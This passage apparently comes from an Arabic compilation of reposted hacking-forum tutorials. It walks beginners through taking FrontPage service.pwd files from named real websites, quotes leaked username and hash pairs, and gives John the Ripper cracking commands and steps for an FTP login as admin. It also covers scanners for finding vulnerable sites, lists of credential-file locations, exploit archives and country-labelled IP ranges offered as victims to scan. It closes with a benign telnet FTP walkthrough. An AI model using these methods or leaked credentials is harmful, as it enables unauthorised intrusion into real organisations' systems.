              ‫وهذا من موقع قودي ‪http://www.goody.com.sa/_vti_pvt/service.pwd‬‬

                   ‫طيب الحين ‪ goodyco‬اليوزر والباسس مشفر واللي هو ‪CalXS8USl4TGM‬‬

                                            ‫وشلون ينفك؟ ينفك ببرنامج اسمه ‪john the repaier‬‬

‫تنزله وتحط الملف المشفر (مع اليوزر) بمجلد واحد وتفتح الدوس وترو ح لمجلد جوهن وتكتب السطر التالي‬
                                                              ‫‪john -i PASSWORD.FILE‬‬

                                                                     ‫وعاد استناه يطلع لك الباسس‬

                                                          ‫طيب نرو ح للفقرة الثالثة واللي هي النظام‬

                                                                      ‫زي ماشفنا النظام هو لينكس‬

                         ‫لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر‬

                                                                     ‫لكن هنا را ح تواجهك مشكلتين‬

 ‫اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ول ‪ telnet‬واكتب عنوان الموقع يطلع لك النظام فوق‬
                                                                                  ‫نوعه وإصدارته‬

                                                       ‫المشكلة الثانية الزم يكون عندك لينكس اصال‬

                                            ‫علشان ثغراته بلغة ال ‪ c‬وهذه ماتشتغل إال عاللينكس فقط‬

                                                                     ‫================‬

    ‫‪ /http://neworder.box.sk‬هذا الموقع مفيد جدا تكتب مثال (فوق بالمربع اللي عاليمين) ‪ IIS‬او‬
                                         ‫‪ apache‬او منتدى واصدارته او اي برنامج ويطلع لك ثغراته‬

   ‫‪ /http://www.ussrback.com‬الموقع هذا خطير جداً جداً ترو ح ل ‪ EXPLOITS‬اللي عاليسار‬
   ‫وتختار اول اختيار هنا ثغرات جميع االنظمة من لينكس و ويندوز و و و الخ.. ومنوعة من ‪ c‬و ‪ perl‬و‬
                                                                                     ‫يوني كود.‬

                                           ‫انتهى،،،‬




                                             ‫981‬
‫" نبذه يسيرة ومبسطة عن كيفية اختراق المواقع "‬

                                                       ‫<منقول من منتديات كويت تن>‬
                                                                          ‫<الكاتب:‬

                                                                              ‫ركز معي‬
             ‫هذا سؤال يحير الجميع بالذات المبتدئين . عليك بأتجاه للموقع المراد اختراقه‬
                         ‫حيث يجب عليك دراسة الموقع كامال من حيث عدة عوامل اهمها‬

                   ‫2- ) نظام السيرفر والمستخدم في الموقع وينقسم السيرفر الى نوعين‬

                                               ‫ا - ) النوع االول هو ( ‪ IIS‬اي اي اس )‬

                                              ‫ب ) - النوع الثاني ( ‪ apachc‬اباشي )‬

                                         ‫6- ) مالحظة وجود محرك بحث في الموقع ام ال‬

                                   ‫3- ) معرفة وقت الذروه لزوار الموقع ووقت الخمول‬

                                                             ‫.- ) معرفة األيبي للموقع‬

             ‫تقريبا هذه اهم العوامل المتخذه كعوامل مطلوبه جدا لتنفيذ العمليه وهذه تاخذ‬

                                                  ‫وقت حيث ان كل شي مايجي بالساهل‬


          ‫سبق وذكرنا السيرفر ‪ IIS‬والداعم لبعض المواقع وهذا امره تقريبا سهل حيث ان‬

                                           ‫اغلب من يستعمل هذه الطريقه هم من الهواه‬

           ‫حيث ان ثغرات تقريبا سهله واختراقها ايضا مرتبط بأن تكون الثغرات التي لديك‬

                                                                       ‫جديده و طااازه‬

          ‫وشوية صبر باألستعانه باهلل ثم ببعض البرامج المساعده وسوف تححق نجاحاتك‬
                                                                        ‫بأذن هللا .‬
          ‫سيرفر ‪ apachc‬وهذا السيرفر قوي جدا وغالبا ال يعمل على البحث عن ثغراته‬

               ‫سوى المحترفون . ألنه يتطلب عدة امور ال يستطيع عملها اال من له خبره‬

                                            ‫بنظام ليونكس ويعرف بعض لغات البرمجه .‬
                              ‫انتهى،،،‬




  ‫" (<س&ج>) في اختراق المواقع للمبتدئين "‬


                               ‫091‬
                                                                       ‫<منقول من منتدى ابن مصر>‬
                                                                         ‫<الكاتب: القناص العربي>‬

                                                             ‫س*: السالم عليكم أخي القناص العربي:)‬
                                                                ‫ج*: أهلين القناص العربي المزيف‪:D‬‬

                                           ‫س*: أحم أحم , أنا كنت عايز أسألك شوية أسألة في الهاكنج.‬
                        ‫ج*: تفضل حبيبي , بس ياريت ماتكون عن اختراق األجهزة , ولعب العيال هذا !!‬


                                                                        ‫س*: ال ال , أنا تطوت كثير :)‬
                                                                                 ‫ج*: أوكى تفضل :)‬


          ‫س6: لقد سمعت كثيرا عن ثغرات الفرونت بيج , هل يمكنك توضيح طريقة استخدام هذه الثغرة .‬
                                                                ‫ج6: بالتأكيد حبي ومن عيوني االثنين‪:D‬‬
      ‫طبعا ثغرات الفرونت بيج بتكون موجودة في أنظمة التشغيل ‪ NT & Unix‬التي يدعم سيرفراتها الـ‬
                                    ‫, ‪FrontPage‬وبتمكنك من معرفة كلمة سر األدمين تبع الموقع :)‬
                                                    ‫وكلمات السر هذه بتكون موجودة في الملفات التالية:‬
                                                                            ‫‪Administrator.pwd‬‬
                                                                           ‫‪Administrators.pwd‬‬
                                                                                   ‫‪Authors.pwd‬‬
                                                                                      ‫‪Users.pwd‬‬
                                                                  ‫التي بتكون عادة في المجلد‪_vti_pvt‬‬
    ‫مثل هذه الملف مثال:): ‪http://www.tradesystemlab.com/_vti_pvt/service.pwd‬‬
                                   ‫وبعد فتح الملف ‪ service.pwd‬هتالقي مكتوب بداخله هكذا تقريبا:‬
                                                                                  ‫-‪# -FrontPage‬‬
                                                                  ‫278‪tradesys:FpNTpIDWSk‬‬
                                                              ‫وهذه كلمة السر المشفرة واسم المستخدم):‬


                   ‫س3: أووووه واااااو ممتاز , ولكن كيف أدخل على الموقع كأدمين بهذه الكلمات ؟؟‪:S‬‬
‫ج: يمكنك استخدام برنامج اف تي بي مثل برنامج , ‪ WS_FTP‬أو ضع بدل ‪ www‬في عنوان الموقع كلمة‬
       ‫‪ftp‬مثل هذا ‪: ftp.ebnmasr.com‬وقم بموضعه في شريط العنوان , وسيطلب منك الموقع اسم‬
                                                                ‫المستخدم وكلمة المرور للموقع :)‬


                          ‫س.: مشكور حبيبي ولكن ليش مايدخل باسم المستخدم وكلمة السر هذه :‬
                                                  ‫278‪tradesys:FpNTpIDWSk‬؟؟)‪(N‬‬
        ‫ج.: بكل بساطه ألنها مشفرة !! , يمكنك فك تشفيرها عن طريق برنامج مثل برنامج ‪John The‬‬
                             ‫, ‪Ripper‬نزله من هنا:‪http://www.openwall.com/john‬‬


       ‫س5: أها , لكني ماأعرف أستخدم هذا البرنامج , ممكن تشرحهولي أخي العزيز القناص لو سمحت ؟؟‬
‫ج5: التستأذن مني ياولد !! , أنا في الخدمة :) , شوف: انت أول ماتنزل البرنامج وتفك ضغطه , هيكون فيه‬
  ‫مجلدين , ‪: doc & run‬الي يهمنا هو مجلد , ‪ run‬شوف: عشان تسهل على نفسك وبدل ماتفتح الدوس‬
                         ‫وتدخل على مجلد البرنامج وهالمشاكل وكمان البعض ما بيعرف يعمل هاألشياء: ‪:p‬‬
                  ‫ابحث في جهازك عن ‪: command.com‬وقم بنسخه والصقه في مجلد , ‪ run‬أوكى ؟؟‬
 ‫وجيب كلمة السر هذه 278‪: tradesys:FpNTpIDWSk‬وحطها في ملف ‪ txt‬باسم ‪ passwd‬مثال‬
 ‫وضعه في مجلد , ‪ run‬وال تقم بفتح , ‪ john.exe‬افتح ‪ command.com‬واكتب فيه األوامر التالية:‬


                                              ‫191‬
   ‫>> ‪john -single passwd.txt‬ليبحث لك عن الكلمات السرية التي تكون مطابقه السم المستخدم‬
                                     ‫>> ‪john -i:Digits passwd.txt‬ليبحث لك عن األرقام فقط‬
                               ‫>> ‪john -i:Alpha passwd.txt‬ليبحث لك عن الحروف الصغيرة‬
 ‫>> ‪john -i:all passwd.txt‬ليبحث لك عن جميع االحتماالت , ( وأنا على طول أستخدم هذا األمر ,‬
                                                              ‫عشان كده بتطول عملية الفك معي) ‪:D‬‬
        ‫وبعدما ينتهي البرنامج من فك الكلمة ستجد كلمة السر المشفرة والمفكوكه بالملف هذا:‪john.pot‬‬


                                         ‫س2: يااااااه , البرنامج طول كثير , متأكد أنه هيفك تشفيرها ؟؟‬
      ‫ج2: أيوووووه الزم يفك تشفيرها في النهاية , حتى لو أخذ أسبوع ;) , ألنه بيجرب جميع االحتماالت.‬
                                   ‫وممكن تعرف حالة البرنامج بالضغط على أي زر من لوحة المفاتيح :)‬


                         ‫س1: الحمد هلل , خالص انفكت كلمة السر , )‪ (Y‬لكن وين اسم المستخدم ؟؟‬
 ‫ج1: في كلمة السر هذه , 278‪: tradesys:FpNTpIDWSk‬هيكون اسم المستخدم ( ‪: tradesys‬‬
                                                           ‫يعني الكلمة الي بتكون قبل عالمة : )‬


                                    ‫س0: قنااااااص , ممكن تقولي كيف جبت هالثغرة من الموقع ؟؟ :$‬
 ‫ج0: هههههههههه ,,, وليه هالوجه الخجالن ;) , أنا بصراحة جبتها بالبحث العشوائي , ولكن انت لو كان‬
    ‫عنك موقع ممكن تعمل عليه سكان ببرنامج فحص مثل برنامج عمران ( المفضل لدي ) ‪ :D‬عشان تطلع‬
                                                                       ‫الثغرات الموجودة بالموقع :)‬


‫س8: طيب أنا عندي سؤالين عالجواب الي فات ده , هأسأل واحد األول :) , ايه طريقة البحث العشوائي هذه‬
                                                                                                   ‫؟؟‬
 ‫ج: أحم أحم , هذه الطريقة : انك تبحث عن ثغرة معينة في محرك بحث يستخدم الـ ‪ spiders‬عشان تالقي‬
‫مواقع كثيييرة فيها الثغرة هذه , في طبعا مواقع كثيرة بتستخدم السبايدرز , لكن لن أقولك لك على أي واحدة‬
        ‫منها , اال هذا الموقع ‪: walla.co.il‬وطبعا هذا موقع اسرائيلي , عشان معظم النتائج تكون مواقع‬
                                                                                       ‫اسرائيلية ;) .‬


                                ‫س22: ممممم , كيف يعني تبحث عن ثغرة معينه ؟؟ , مافهمتك زين !!‬
  ‫ج22: أنا وهللا ماأستخدم هالمواقع اال للبحث عن ثغرات الفرونت بيج :$ , يعني انت مثال عايز تبحث عن‬
‫الثغرة التي تم ذكرها سابقا , هتكتب ايه ؟؟ , مانت كاتب غير كلمة واحدة , هذه): ): ): ‪: service.pwd‬‬


     ‫س22: أهاااااا , مشكور حبيبي , كنت عايز أسألك كمان عن كيفية عمل برامج السكان على الثغرات :)‬
    ‫ج22: البرامج هذه بتكون فيها مجموعة كبيرة من الثغرات أو الـ , ‪ EXPLOITES‬وبتبدأ تجرب ثغرة‬
   ‫ثغرة على الموقع , وتطلعلك النتائج :) , وفي موقع رهيييب عشان تجيب منه الـ , ‪ EXPLOITES‬هذا‬
                                                       ‫هو:/‪. http://www.ussrback.com‬‬


                                              ‫انتهى،،،‬




             ‫" برنامج ‪ CgiScaner‬للبحث عن الثغرات "‬


                                               ‫291‬
                                                                   ‫<منقول>‬
                                                           ‫<الكاتب: بو هاجر>‬

                                             ‫هنا برنامج رائع للبحث عن الثغرات‬




                                                                  ‫رقم2 خروج.‬
                                                ‫رقم6 أظهار الكودات المستخدمة.‬
                                                               ‫رقم3 بدأ البحث.‬
                                                     ‫رقم. تضع العنوان للضحية.‬
                     ‫وأترك البرنامج وسوف يظهر لك الثغرات الموجودة فى الموقع.‬

                                              ‫وصلة البرنامج..‬
                ‫‪http://mypage.ayna.com/vox99/cgiscan3.zip‬‬

                         ‫انتهى،،،‬




‫" شرح برنامج سوبر سكان لمعرفة المنافذ المفتوحة في‬
                    ‫المواقع "‬


                          ‫391‬
                                           ‫<منقول من منتديات شامل نت>‬
                                                    ‫<الكاتب: مشاريو>‬

‫تعريف بالبرنامج ::: هذا البرنامج يقوم بالبحث عن المنافذ المفتوحه في جهاز‬

            ‫الضحيه ,,, الن بعض البرامج يكون فيها الباحث ضعيف وال يصيد‬

 ‫اي اي بي به منفذ مفتو ح ومن امثلة ذلك برنامج السب سفن جولد ,, رغم ان‬

‫البرنامج وقوة اتصاله ممتازه اال ان الباحث ضعيف فنستخدم هذا البرنامج كاداة‬

                           ‫مساعده ’’’’’ وال اطيل عليكم بالكالم اليكم الشر ح‬

                          ‫انا شرحت البرنامج رغم سهولته وفوق ذلك معرب‬

                    ‫ولكن البعض اليعرف استخدامه ... اليكم واجهة البرنامج‬

                                                                          ‫!‪Error‬‬




                                      ‫ثالث خطوات تقوم بها وهي كالتالي::‬


                    ‫491‬
          ‫انظر اعلى اليمين تجد قائمة المنافذ ادخل قائمة المنافذ لتحديد المنفذ‬

     ‫المراد البحث فيه مثالً السب سفن المنفذ الخاص به .1316 او 3.62.‬

                                                        ‫انظر الصوره التاليه ؟‬




                               ‫في رقم واحد نكتب المنفذ الذي نريد البحث فيه‬

            ‫رقم اثنين لكي نضيف المنفذ** مالحظه نقدر نضيف اكثر من منفذ‬

     ‫بعد ماننتهي من اضافة المنفذ نضغط اوكي للتأكيد ونتأكد من ان المنفذ قد‬

                                                     ‫اضفناه كما في الصوره.‬




               ‫بعد ذلك نرجع للصوره االولى ونضبط الخيارات كما هو موضح‬

                                         ‫ونحدد االي بي من ------------ الى‬

‫بعد ذلك نضغط ابــــــــــــدأ فتظهر لنا االي بيات واالي بي الذي به منفذ مفتو ح‬

      ‫نحصل عالمة + على يساره عندما نضغط عليه يظهر لنا المنفذ المفتو ح‬

                                    ‫كما في الصوره االولى........ انتهى و,,,,‬



                    ‫591‬
                                            ‫وصلة البرنامج...‬
 ‫‪http://mypage.ayna.com/a7lla1/superscan.zip‬‬


       ‫خذوا هذه االيبات وبحثوا فيها شدوا حيلكم في االيبيات االولى‬

 ‫>--------552.23.051.212---------------1.31.051.212أسرائيل‬
   ‫>----------552.081.0.26-----------------1.051.0.26أسرائيل‬
 ‫>--------552.27.302.991---------------1.57.302.991أسرائيل‬
 ‫>--------552.802.29.931---------------1.802.29.931أسرائيل‬
 ‫>--------552.24.411.291---------------1.24.411.291أسرائيل‬
  ‫>---------552.34.27.612----------------1.34.27.612أسرائيل‬
 ‫>-------552.311.341.212--------------1.311.341.212أسرائيل‬
 ‫>--------552.891.88.902---------------1.891.88.902أسرائيل‬
 ‫>--------552.832.92.212---------------1.832.92.212أسرائيل‬
 ‫>-------552.201.821.391--------------1.201.821.391أسرائيل‬
 ‫>-------552.632.711.291--------------1.632.711.291أسرائيل‬
  ‫>---------552.402.8.312----------------1.402.8.312أسرائيل‬
 ‫>--------552.021.52.212---------------1.021.52.212أسرائيل‬
  ‫>---------552.1.931.821----------------1.1.931.821أسرائيل‬

  ‫>------------552.722.2.212>-------------1.422.2.212السعوديه‬
  ‫>-----------522.552.62.212>--------------1.1.62.212السعوديه‬
 ‫>-----------552.02.832.312>-------------1.0.832.312السعوديه‬
  ‫>------------552.3.201.212>-------------1.1.201.212السعوديه‬
‫>----------552.591.611.212>-----------1.091.611.212السعوديه‬
 ‫>-----------552.07.601.212>------------1.06.601.212السعوديه‬


 ‫>-----------552.13.922.591>-------------1.6.922.591االمارات‬
‫>----------552.552.922.591>-----------1.422.922.591االمارات‬
 ‫>-----------552.03.071.491>------------1.03.071.491االمارات‬
 ‫>-----------552.552.24.312>--------------1.1.24.312االمارات‬

  ‫>-------------552.08.7.802>--------------1.07.7.802الكويت‬
 ‫>----------552.552.622.591>-----------1.042.622.591الكويت‬
 ‫>-----------552.541.93.591>------------1.031.93.591الكويت‬
 ‫>----------552.552.781.861>-------------1.1.781.861الكويت‬

  ‫>-----------52.552.331.491>-------------1.1.331.491قطر‬
   ‫>------------552.04.85.902>-------------1.04.85.902قطر‬
  ‫>-----------552.331.28.602>------------1.331.28.602قطر‬

 ‫>-----------552.901.94.602>------------1.901.94.602عمان‬
  ‫>-------------552.7.27.212>--------------1.1.27.212عمان‬

‫>----------552.002.881.391>------------1.05.881.391البحرين‬



                                 ‫691‬
                                             ‫انتهى،،،‬




   ‫" شرح برنامج ‪ Shadow Scan Security‬لتحليل الموقع "‬

                                                                         ‫<منقول من منتدى إعصار>‬
                                                                                ‫<الكاتب المدمر>‬

                                                                           ‫نبذة بسيطة عن البرنامج:‬
  ‫هذا البرنامج هو أكثر البرامج فعالية في اكتشاف الثغرات وأيضا المنافذ المفتوحة ف المواقع ولديه أعمال‬
 ‫كثيرة لكني لن أتطرق إال لعملية واحدة فقط وهي شر ح كيفية اكتشاف الثغرات في المواقع ومعرفة النطاقات‬
‫المستخدمة لهذا الموقع وبالنسبة للخيارات الباقية لن أشرحها ألنها سوف تأخذ وقت طويل لكني سوف أقسم‬
   ‫شرحي لهذا البرنامج ألقسام عدة وسوف أبدئها باألعظم وهو شر ح لكيفية إخراج ثغرات الموقع والمنافذ‬
                                                 ‫الخاصة به والمواقع المسجل بها والمزيد من الوظائف‬

                                   ‫أوال تنزيل البرنامج وتنصيب الكراك‪Shadow Scan Security‬‬

                                                                                     ‫مافيه أبسط منه‬

                                                                       ‫حمل البرنامج من هذي الوصلة‬

                                                   ‫‪http://www.safety-lab.com/SSS.exe‬‬

                                                             ‫وبعد مايكتمل التحميل حمل الكراك من هنا‬

     ‫‪http://www.e3sar.net/almodammer/ShadowSecurityScanner5.35.exe‬‬

                                                                             ‫الطريقة:‬
                               ‫========================================‬
                                             ‫بعد تحميل البرنامج وتنزيله وعمل ‪ SetUp‬له‬
                                                                          ‫افتح الكراك‬
                                                        ‫وبعد ذلك ستظهر هذه الصورة:‬



                                               ‫791‬
                                       ‫+++++++++++‬
                           ‫ُ[]2 []اضغط ليتم تنفيذ الكراك‬‫ٍ‬
             ‫[]6 []بعد إتمام عملية الكراك اضغط هنا للخروج‬
‫========================================‬

                              ‫&*****شـــ البرنامج ـــر ح*****&‬

‫سوف أشر ح باختصار ومن يصعب عليه الفهم أرجو أن يتقدم لي بالسؤال‬

                          ‫=(بعد تحميل البرنامج قم بفتحه من قائمة‬
                                                       ‫ابدأ‪Start‬‬
                                        ‫وابحث عنه ضمن البرامج‬
                                       ‫بعد إيجاد البرنامج قم بفتح‬
                                   ‫‪ShadowScanSecurity‬‬
                                                 ‫ليـأتي لك هذا)=‬

                                                       ‫الشكل- 2-‬




                                     ‫أثناء الضغط على‪Scanner‬‬

                                                       ‫الشكل-6-‬




             ‫891‬
  ‫2= إضافة سياسة جديدة والمقصود بها أيقونة أخرى وهي الرقم . ولكن تحمل اسمك (والداعي ألن تنشأ‬
                                                            ‫باحث أو سياسة جديدة لك يكفيك الموجودة)‬
                           ‫6= إعدادات لهذا الباحث وأيضا انا الأنصحك بتغيير شيء أبدا في هذا الخيار‬
‫3= حذف الموجه الجديد التي انت صممته والمقصود األيقونة التي تشبه رقم . ولكن من تصميمك فبضغطك‬
                                                                                    ‫هنا سوف تحذفها‬
                              ‫.= عليك تظليله وهو المربع الذي يوجد به خصائص البحث عن كل شيء‬
                                  ‫5= لرجوع للخلف والأظن أن هناك رجوع ألنها العملية واإلطار االول‬
                                                                       ‫2= اضغطها إذا أردت المتابعة‬
                                                                                     ‫1= إزالة اإلطار‬

                                                                                          ‫الشكل-3-‬




                                               ‫991‬
                                                                      ‫(2) للرجوع إلى الشكل- 6-‬
                                                                    ‫(6) الذهاب إلى العملية التالية‬
                                                                             ‫(3) إلغاء إكمال العملية‬

                                                                                          ‫الشكل-.-‬




                                                                      ‫+2 + إضافة موقع للبحث فيه‬
                                                                      ‫+6 + إضافة أي بي من وإلى‬
                    ‫+3 + تحميل من ملف سواء كان يحتوي على مواقع تريد البحث عنها او آي بيات‬
                                   ‫+. + عند إضافة موقع وبعد تحديده أثناء الضغط هنا سوف ينحذف‬
                                                   ‫+5 + العودة والرجوع إلى الخلف أي :الشكل-3-‬
                                                                                ‫+2 + إتمام العملية‬
‫+1 + إزالة والخروج من اإلطار إلى واجه البرنامج الرئيسية كباقي األزرار السابقة في األشكال السابقة‬

                                                                                          ‫الشكل-5-‬

                         ‫أثناء ضغط الزر ‪ Done‬وفي الخطوة السابقة سوف يظهر هذا المربع الكبير‬
                                     ‫ومن هنا سوف نبدأ البحث عن الثغرات أنظر الشكل لتفصيل أكثر‬




                                            ‫002‬
                                                                                 ‫الشكل-6-‬

                   ‫بعد الضغط على ‪ Start Scan‬وذلك بتظليل الموقع والضغظ بزر الفأرة اليمين‬

                                                   ‫انتظر قليال بعد ضغطك لرقم 3 في الشكل-5-‬

‫وسوف يقوم البرنامج بالبحث في الموقع والمنافذ الخاصة به مع النطاقات كما هو موضح في هذا الشكل‬




                                        ‫انتهى،،،‬




   ‫" اماكن وجود ملف الباسورد في أنظمة التشغيل "‬

                                                                     ‫<منقول من منتدى الحلم>‬
                                                                        ‫<الكاتب: بالك هنتر>‬

                                                                            ‫في نطم ليونكس‬
                                                                          ‫‪/etc/shadow‬‬




                                          ‫102‬
                                                                         ‫في نظم صن ميكروسيستيمز‬
                                                                                ‫‪/etc/shadow‬‬

                                                                         ‫في نظم ال ‪BSD‬بصفه عامه‬
                                                                        ‫‪/etc/master.passwd‬‬

                                                     ‫في نظم السيليكون جرافيكس ‪ SGI‬المسمى ‪ARIX‬‬
                                                                            ‫‪/etc/shadow‬‬

                                                                        ‫نظام اي بي ام المسمى ‪AIX‬‬
                                                                      ‫‪/etc/security/shadow‬‬

    ‫نظم يونكس بصفه عامه ((اتش بي يو اكس - (( ترو يونكس 46 (( خاص بالمنفريم ونظم الريسك .2‬
                                                                 ‫وبعض منتجات االلفا )) )) ))‬
                                                                            ‫‪/etc/shadow‬‬

                                                  ‫((اغلب هذه االصدارات تعتمد تشفير 5‪ MD‬القوي ))‬


                                                   ‫نظم ويندوز بصفه عامه )) ‪(( 2000 - NT - XP‬‬
                                                              ‫(( الملف المفعل بتشفير )) ‪LanMan‬‬
                                                            ‫‪/winnt/system32/config/sam‬‬
‫((هذا الملف مغلق عادة اال عند االقالع من النظام وال يسمح بفتحه او نسخه طالما النظام يعمل حتى ولو كان‬
                                                                    ‫لديك صالحيات االدمنيستريتور ))‬


                                                                           ‫((الملف االحتياطي ))‬
                                                              ‫_.‪/winnt/repair/sam or sam‬‬


                     ‫في الويندوز اكس بي البروفيشينال واصدارات الويسلر (( سيرفر - ادفانسد سيرفر ))‬
                                                                ‫لن تجد الويندوز في مجلد ‪WINNT‬‬
                                                         ‫ولكن سيكون كالويندوز العادي‪. Windows‬‬

                                             ‫انتهى،،،‬




                  ‫" اختراق الموقع (الجزء األول) "‬

                                                                 ‫<منقول من موقع الجهاد اإللكتروني>‬




                                               ‫202‬
                                                                                            ‫مقدمه :‬

 ‫مرت فترة طويلة منذ الدرس السابق وال اعرف لماذا مر كل هذا الوقت دون أن ابدأ في كتابة هذا الدرس ..‬
‫ربما لصعوبة الموضوع و تشعبه .. و لكن ها قد حان الوقت لمجابهة الصعوبة و التشعب و تقديم و لو حتى‬
                                                             ‫فكرة بسيطة عن هذا الموضوع الممتع ..‬


                                           ‫سأعيد تعريف ‪ Telnet‬من جديد و لكن بطريقه اكثر بساطه ..‬
       ‫‪Telnet‬هو برنامج يستخدم في إنشاء وصله بين جهازين ،و الجهاز المتصل يستخدم عنوان الجهاز‬
   ‫المستهدف و رقم المنفذ ‪ Port‬الذي سيتم االتصال عليه ،و الجهاز المستهدف (الخادم) يشغل برنامج آخر‬
        ‫)‪(Daemon‬يستمع على هذا المنفذ و تتم عمليه اإلرسال واالستقبال باستخدام أحد البروتوكوالت .‬
  ‫تشبيه من حياتنا العملية : نفترض أن هناك رجل في فرنسا (المستهدف) و أنت (المتصل) تريد إقامة حوار‬
‫معه (وصله) و أنت في مصر .. فالبد لك من استخدام وسيله اتصال )‪ (Telnet‬و لنفرض أنها الهاتف الذي‬
‫البد للرجل أن يضعه على أذنه )‪ (Daemon‬لكي يسمعك .. و لنفرض أيضا أن هذا الرجل ال يتحدث العربية‬
   ‫.. إذن فالبد لك من استخدام الفرنسية (البروتوكول المستخدم) حتى تتحدث (اإلرسال واالستقبال) بحريه .‬


      ‫مما سبق نستنتج أن ‪ Telnet‬هو مجرد وصله (مثل الهاتف) .. و انه البد لنا من معرفة البروتوكول‬
  ‫المستخدم في االتصال حتى ننجح في اإلرسال و االستقبال . كما انه البد لنا من أن نعرف أيضا أنه البد من‬
                                            ‫برنامج ‪ Daemon‬يتسمع على المنفذ المراد االتصال عليه .‬


                                                          ‫استخدام ‪ Telnet‬ك ‪FTP Client‬‬
  ‫المنفذ الذي سيتم االتصال عليه في حاله استخدامنا بروتوكول نقل الملفات ‪FileTransfer Protocol‬‬
                                                                    ‫في الغالب سيكون 26 ..‬

                                                                              ‫أين الصعوبة إذن ؟‬
   ‫الصعوبة تكمن في أننا لكي نستخدم ‪ Telnet‬ك ‪ FTP Client‬يجب علينا اإللمام بقدر كبير ببروتوكول‬
                                                                                       ‫!! ‪FTP‬‬
                ‫و لكن هذا لن يمنعني من عرض بعض األمثلة إلظهار كيفية التعامل مع هذا البروتوكول ..‬

                                                                              ‫بدء االتصال‬
                                   ‫2- قم بتشغيل ‪ Telnet‬و شبك على ‪ ftp.zdnet.com‬بالمنفذ 26‬
                                                                        ‫و هذا ما سيظهر لك‬

                                                                        ‫- ‪Sources Code‬شفرة‬

         ‫.‪220 l19-sj-zdnet.zdnet.com NcFTPd Server (licensed copy) ready‬‬



      ‫و السطر السابق يسمي ‪ Banner‬الخاص بال ‪ FTP Daemon‬المستخدم في موقع ‪ zdnet‬و هي‬
‫تختلف باختالف الموقع الذي سيتم التشبيك عليه . و الرقم الموجود في البداية يدل على نجا ح االتصال و هو‬
                                                                                          ‫رقم ثابت .‬
‫6- الخطوة التالية هي الولوج باستخدام اسم المستخدم ‪ Username‬و كلمة السر .. ‪ Password‬بما أن‬
                    ‫‪zdnet‬تدعم المستخدم ‪ Anonymous‬سيتم استخدامه في الولوج للنظام كالتالي:‬
                                                                                              ‫ستكتب‬

                                                                        ‫- ‪Sources Code‬شفرة‬



                                               ‫302‬
                                                                               ‫‪user anonymous‬‬



                                                                              ‫و سيستجيب الخادم بالتالي‬

                                                                            ‫- ‪Sources Code‬شفرة‬


   ‫.‪331 Guest login ok, send your complete e-mail address as password‬‬



                                                                                      ‫ثم تكتب أنت التالي‬

                                                                            ‫- ‪Sources Code‬شفرة‬


                                                                                     ‫‪pass @zorro‬‬



‫و بالطبع عند الولوج بالمستخدم ‪ Anonymous‬تقوم بإعطاء عنوان البريد اإللكتروني الخاص بك ككلمة‬
  ‫السر .. و إذا لم ترد إعطاء بريدك فيمكنك أن تكتب أي شئ يأخذ شكل البريد (أي يحتوي على الرمز @ (‬
                                                                     ‫و سيستجيب الخادم بالتالي‬

                                                                            ‫- ‪Sources Code‬شفرة‬


                 ‫.‪230-You are user #552 of 2000 simultaneous users allowed‬‬
                                                                      ‫-032‬
                                               ‫.‪230 Logged in anonymously‬‬




                     ‫و بالطبع تلك اإلستجابه قد تختلف من موقع آلخر .. إال في الرقم في بداية كل سطر ..‬
                                                           ‫أنت اآلن قد قمت بالولوج إلى الخادم بنجا ح .‬


 ‫بعد أن تمت عمليه الولوج للنظام يجب إنشاء وصله إلرسال واستقبال البيانات( قائمه بالملفات الموجودة أو‬
  ‫الملفات ذاتها) .. إذن ما الذي كنا نفعله منذ قليل ؟!! ما قد فعلناه منذ قليل هو إنشاء وصله إلرسال األوامر‬
                                                          ‫للنظام و استقبال استجابة النظام على األوامر .‬
                                                                ‫و لكي ننشئ تلك الوصلة ،هناك طريقتين‬
     ‫األولي : تنشئ هذه الطريقة الوصلة بان يرسل الزبون (أنت) رقم ‪ IP‬الخاص به و المنفذ المفتو ح الذي‬
                                                           ‫يستطيع الخادم استخدامه في إرسال البيانات .‬
‫و لكن تلك الطريقة تتطلب منك فتح أحد المنافذ على جهازك و هذا سيتطلب برنامج خاص لفتح هذا المنفذ ..‬
                                                                        ‫و لذلك لن نستخدم تلك الطريقة .‬
                                      ‫الثانية : تنشئ هذه الطريقة الوصلة بان يرسل الزبون األمر ‪PASV‬‬


                                                 ‫402‬
                                                                             ‫- ‪Sources Code‬شفرة‬


                                                                                                ‫‪PASV‬‬




      ‫و سيرد الخادم برقم ‪ IP‬الخاص به و المنفذ المفتو ح (على الخادم بالطبع) الذي يستطيع الزبون (أنت)‬
                                                                                    ‫االتصال عليه ..‬
                                                                                                ‫مثال‬

                                                                             ‫- ‪Sources Code‬شفرة‬


                                  ‫)14,21,16,96,981,702( ‪227 Entering Passive Mode‬‬




                                            ‫و الرقم الطويل الموجود بين األقواس تفسيره كالتالي ..‬
  ‫أول أربع مجموعات (من اليسار) هو ال ‪ IP‬الخاص بالخادم و في هذه الحالة يكون 22,82,802,126 ..‬
                                        ‫أما الرقمان التاليان فيمثالن رقم المنفذ و يتم حسابه كالتالي‬
                                                                    ‫3113 = 14 + 652 × 21‬


‫و لذلك فالخطوة التالية التي يجب على الزبون اتباعها هي فتح وصله جديده مع الخادم على المنفذ 3223 ..‬
‫ولكي تقوم بمثل هذا األمر يتوجب عليك فتح نافذة ‪ Telnet‬جديده و تشبك على ‪ ftp.zdnet.com‬بالمنفذ‬
                                                                                                 ‫3223 ..‬
      ‫إذن عندما تريد أن ترسل أحد األوامر سترسله من النافذة األولى و النافذة الثانية ستظهر بها البيانات ..‬
                                                                                                      ‫مثال‬
                               ‫عندما ترسل األمر) ‪ LIST‬يستخدم لعرض محتويات الدليل) في النافذة األولى‬

                                                                             ‫- ‪Sources Code‬شفرة‬


                                                                                                  ‫‪LIST‬‬




                                                           ‫سيستجيب الخادم بالتالي في النافذة األولى أيضا‬

                                                                             ‫- ‪Sources Code‬شفرة‬

                            ‫.‪125 Data connection already open; Transfer starting‬‬




                                                  ‫502‬
  ‫و ستظهر محتويات الدليل في النافذة الثانية ثم سيتم غلق االتصال في النافذة الثانية بمجرد إتمام عرض‬
                                                                                    ‫محتويات الدليل .‬

‫و هكذا كلما أردت أن ترسل أمر عرض محتويات دليل ما أو استقبال أو إرسال ملف ما ، يجب أن تبدأ بأمر‬
                      ‫.. ‪PASV‬ثم تنشئ اتصاال جديدا بعد حساب رقم المنفذ باتباع الخطوات السابقة .‬



